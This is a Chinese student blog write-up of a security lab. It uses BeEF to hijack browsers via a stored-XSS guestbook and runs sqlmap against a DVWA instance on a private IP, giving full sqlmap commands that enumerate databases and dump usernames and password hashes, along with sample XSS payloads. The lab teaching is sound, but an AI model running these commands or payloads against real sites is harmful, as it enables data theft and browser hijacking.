实验三 XSS和SQL注入 - - Y

最新推荐文章于 2023-06-10 14:21:10 发布
最新推荐文章于 2023-06-10 14:21:10 发布
阅读量329 收藏
点赞数
分类专栏: 我的学习日记——网络渗透 kali 文章标签: xss sql kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51153624/article/details/111394440
版权

实验三 XSS和SQL注入

文章目录

前言

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

提示:以下是本篇文章正文内容,下面案例可供参考

一、XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

在实验的最开始,我们应该利用WindoWs sever 2003 搭建好一个网站(我的电脑一直在卡,就是不想让我把这个实验做完 (╥﹏╥) 所以…我就和室友一起了_(😄)∠)_ )
在这里插入图片描述

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

扫不出来…
在这里插入图片描述

2、Kali使用beef生成恶意代码,截图。
输入命令:cd /usr/share/beef-xss# ./beef

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板, ,截图。

在这里插入图片描述
看到下面这个页面就成功了

在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

在这里插入图片描述
在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

答:实验中XSS攻击属于存储类型

题外话(假的,这不是题外话):

常见的三种 XSS 攻击类型
1.反射型: 一般来说这种类型的 XSS,需要攻击者提前构造一个恶意链接,来诱使客户点击,比如 这样的一段链接:www.abc.com/?params=< script>alert(/xss/)</ script>。
2.存储型: 这种类型的 XSS,危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段 JavaScript 代码,并且服务器没有正确进行过滤输出,那就会造成浏览这个页面的用 户执行这段 JavaScript 代码。
3.DOMXSS: 这种类型则是利用非法输入来闭合对应的 html 标签。 比如,有这样的一个 a 标签:< a href=’$ var’> </ a> 乍看问题不大,可是当$var 的内容变为 ’ οnclick=’alert(/xss/)
//,这段代码就 会被执行。

你以为这次就这些…
看了目录就知道后面还有…

SQL注入,请继续!

二、SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验开始前,我们需要搭建实验环境。
首先启动Metasploitable2虚拟机(开启之后就不管它了…)

转战kali

输入命令“ifconfig”得到ip地址
在这里插入图片描述

然后打开浏览器输入你所得到的ip地址,按下回车键后选择“DVWA”:
在这里插入图片描述

进入到下面这个页面后输入用户名和密码(用户名和密码在最下面)
在这里插入图片描述

进入后首先要做的就是将“DVWA Security”这个选项下面的“Script Security”选为“low”
在这里插入图片描述

最后就可以进入正题了
在这里插入图片描述

1.注入点发现

首先肯定是要判断是否有注入漏洞。
在输入框输入1,返回

ID: 1
First name: admin
Surname: admin

返回正常;
再次输入1’,报错,返回

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘‘1’’’ at line 1

此时可以断定有SQL注入漏洞,

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

在这里插入图片描述

我们最开始就将所需要的环境设置好了,现在只需要按照题目的要求一步一步来就可以了。
要求:在输入框中输入“1”,返回
图如下:
在这里插入图片描述

它返回是正常的,当我再次输入“1”,再返回时,它还是如上图所示。

2.枚举当前使用的数据库名称和用户名。

在这里插入图片描述

输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie “security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545” -b --current-db --current-user
在这里插入图片描述
Sqlmap输出截图:
在这里插入图片描述
结果:得到使用的用户为root@%;
当前的数据库为dvwa

3、枚举数据库用户名和密码

在这里插入图片描述
输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie “security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545” --string=“Surname” --users --password

在这里插入图片描述
Sqlmap输出截图。
在这里插入图片描述
在这里插入图片描述

4、枚举数据库

–dbs:枚举当前数据库

输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie ‘security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545’ --dbs
在这里插入图片描述
Sqlmap输出截图。
在这里插入图片描述

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表

输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie ‘security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545’ --string=“Surname” -D dvwa --tables
在这里插入图片描述
Sqlmap输出截图
在这里插入图片描述

6、获取指定数据库和表中所有列的信息

D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息

输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie ‘security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545’–string=“Surname” -D dvwa -T users --columns

在这里插入图片描述
Sqlmap输出截图
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列
–dump:存储数据表项

输入的命令:
sqlmap -u “http://192.168.136.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie ‘security=low;PHPSESSID=a6404ae7ab116bb2a92af68a9605c545’ -D dvwa -T users -C user,password --dump
在这里插入图片描述
Sqlmap输出截图
在这里插入图片描述
查看down到本地的用户名与密码,截图。

(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)查看down到本地的用户名与密码

在结尾我们可以看到down到本地的用户名和密码所保存的位置,根据这个位置去文件浏览器中打开它

在这里插入图片描述

在下面我们并没有发现“.sqlmap”这个文件夹,因为它是一个隐藏文件夹
在这里插入图片描述

按下“ctrl+h”,我们往下滑就看到了
在这里插入图片描述

继续往下找,就可以查看down到本地的用户名与密码,如下图:

在这里插入图片描述

是榛子耶~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
它包含了SQL注入、跨站脚本(XSS)、盲注等漏洞类型。在Linux系统上,可以通过`yum install`快速搭建LAMP环境,安装Apache(httpd)、MySQL Server、MySQL客户端、PHP以及PHP的GD库,为部署DVWA做好准备。 **实战...
复现XSS漏洞及分析
qq_61739597的博客
09-01 2814
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
BugKu Web WriteUp
AlexYoung28的博客
08-24 2200
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
东隅的博客
09-17 1490
本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)。本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解。这个靶站其实可以说是我出的第一道web题吧,里面藏了三个flag,拼接为一个完整的flag三个flag的位置分别在:数据库中、admin用户的cookie中、网站源码文件flag.php中,分别对应sql注入漏洞、xss漏洞、文件上传漏洞,我想出第四个flag部分,对应csrf漏洞。
SQL注入修复、XSS漏洞 过滤器及Cookie劫持攻击
qq_43420577的博客
05-29 825
然后在WEB.XML里面配置。一、解决sql注入问题。三、cookie劫持。
AWVS使用教程
热门推荐
Jim的博客
09-05 3万+
工具分为 4大块。简要概述我们最相关的3部分  1) web scanner: 扫描器,默认情况产生10个线程的爬虫  2) 工具箱: 集成很多好用的工具,比如 http fuzzer  3) 配置: 呵呵,只要懂英文就看得明白  1.点击new scan,启动扫描 注意:可以设置扫描重点,默认15种配置如下: 扫描结果分析
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入XSS、盲注等常见的一些安全漏洞。
Graduation-design:MYK毕业设计
03-12
- **SQL注入防御**:使用预编译语句或ORM框架防止SQL注入攻击。 - **XSS防护**:对用户输入进行过滤或转义,防止跨站脚本攻击。 - **CSRF令牌**:防止跨站请求伪造,确保用户操作的安全性。 ### 5. 测试与调试 - **...
广告排行亚洲交友推广代码PHP版-y-php.zip
最新发布
03-21
6. **安全性**:PHP源代码需要考虑防止SQL注入XSS攻击等网络安全问题,确保用户数据的安全。 【描述】"广告排行亚洲交友推广代码PHP版-y-php.zip" 暗示了这套代码可能特别针对亚洲市场,可能包含了适应不同地区...
masterframeworks-api-node:Api Rest creada和utilizada en elMásterFrameworks JS,以及reutilizada和不同的前端
02-13
9. **安全考虑**:包括但不限于防止 SQL 注入XSS 攻击、CSRF 攻击,使用 JWT(JSON Web Tokens)进行身份验证,以及数据加密。 10. **测试**:使用 Mocha、Chai 等测试框架对 API 进行单元测试和集成测试,确保其...
复现awvs——XSS(反射型)漏洞
记录并分享学习安全的知识点..
12-29 2921
1.首先通过awvs对网站进行扫描如下: 2. 判断为xss反射型漏洞,然后打开目标网站,首先先找到变量ref 3.可以看出被隐藏了,将type值改为text文本框,进行复现
实验三 XSSSQL注入
qq_65950075的博客
11-20 1076
首先将实验三文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的),否则无法打开网站。beef打开后,弹出beef登录的网页,网址改为自己的kali机IP,然后登录,默认账号密码都为beef,现在可能要自己改。
常见web漏洞(awvs、nessus)验证方法小记-低危漏洞
weixin_43875708的博客
03-12 1万+
文章目录1.【低危】未加密的连接(Unencrypted connection)漏洞描述漏洞危害漏洞证明修复建议2.【低危】SSL弱加密(主机漏洞)漏洞描述漏洞危害漏洞证明修复建议【低危】Cookie中缺少HttpOnly标志(Cookie(s) without HttpOnly flag set)漏洞描述漏洞危害漏洞证明修复建议【低危】Cookie中缺少secure属性(Cookie(s) wi...
复现awvs——sql注入漏洞(时间盲注)
记录并分享学习安全的知识点..
01-14 1600
一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入注入方式分 • 报错注入 • 盲注 • 布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 三、漏洞复现——bp联合xray,手测加sqlmap爆破 xray开
AWVS14.7sql注入部分源码分析
Ciyaso的博客
04-16 1717
AWVS-SQL注入部分源码分析 **PS:**在文章中我会对一些句式进行缩进,文字默认定格,输入缩进对应着代码缩进,所以请注意我的段落缩进。 classErrorBasedSQLInjection.inc classSQLErrorMessages() this.plainArray 存储常见的sql注入报错信息,如 'Microsoft OLE DB Provider for ODBC Drivers', 'Error Executing Database Query', 'Microsoft OLE
续Web应用扫描AWVS,和新-SQL注入类型
BITTER的博客
07-21 494
Acunetic Web Vulnerability Scanner ,就是主要学习了这个软件的基本使用方法,对于网站漏洞有着很好的检测作用 Xshell(用来在windows中连接远程不同系统的服务器)、堡垒机(用来监控运维人员的相关操作,例如对网络设备、安全设备、服务器的操作) 还有一个:初步接触了解了sql注入类型: ...
DWVA XSS(DOM型)
weixin_44023403的博客
12-27 526
DWVA XSS(DOM型)XSSXSS (DOM型)lowMediumHigh XSS XSS的实质其实是HTML代码与Javscript代码的注入。但由于XSS的攻击对象是与客户对等的Browser端,因此常常不被开发者所重视。 一般意义上的XSS通常可以用简单的方法检测出来:当用户输入中某个参数的全部或其中一部分,原封不动地在源代码里出现时,我们就可以认为这个参数存在XSS漏洞。 XSS (DOM型) DOM XSS的产生并没有和后台服务器产生交互,而是通过浏览器的dom树解析产生的。 low 源码
xss攻击 SQL注入
qq_65208982的博客
06-10 1198
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入
网络安全之渗透(基础知识点)
VN520的博客
04-04 4657
1、 脚本语言2、常见脚本语言3、 HTTP协议,HTTP代理4、 CMS(B/S)内容管理系统5、 MD5(不可逆的,常见的MD5解密网站其实是将一些明文进行MD5加密,形成一个库,在查询的时候将密文与库中的信息进行碰撞,最后得到明文)
xsssql注入区别
08-13
XSS注入SQL注入虽然都属于注入攻击,但它们有一些区别和特点。 首先,XSS注入SQL注入在攻击指令注入的方式上有所不同。XSS注入是通过向用户输入的域注入恶意的HTML代码(即脚本),而SQL注入则是通过向用户输入的域注入恶意的SQL命令。因此,XSS注入攻击的目标是在用户终端执行恶意代码,而SQL注入攻击的目标是获取或控制后台数据库。 其次,XSS注入SQL注入都是利用了Web服务器未对用户输入数据进行严格的检查和过滤的漏洞。这种漏洞使得黑客能够将恶意代码或命令注入到网页中,从而实现攻击目的。 另外,XSS攻击的主要目标是窃取Web终端用户的敏感数据,并有可能控制用户终端操作;而SQL注入攻击的主要目标是窃取Web后台数据库中的敏感数据,并有可能控制整个数据库服务器。因此,XSS攻击的影响范围更局限于用户终端,而SQL注入攻击的影响范围更广泛,涉及到整个数据库系统。 总结起来,XSS注入SQL注入的区别主要在于攻击目标和注入内容的差异。XSS注入攻击主要通过注入恶意的HTML代码来实现窃取用户数据和控制用户终端操作的目的,而SQL注入攻击主要通过注入恶意的SQL命令来实现窃取数据库数据和控制数据库服务器的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sql注入xss注入有什么不一样呢?](https://blog.csdn.net/qq_24601199/article/details/116332531)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [XSS基础](https://blog.csdn.net/qq_57157540/article/details/124413128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值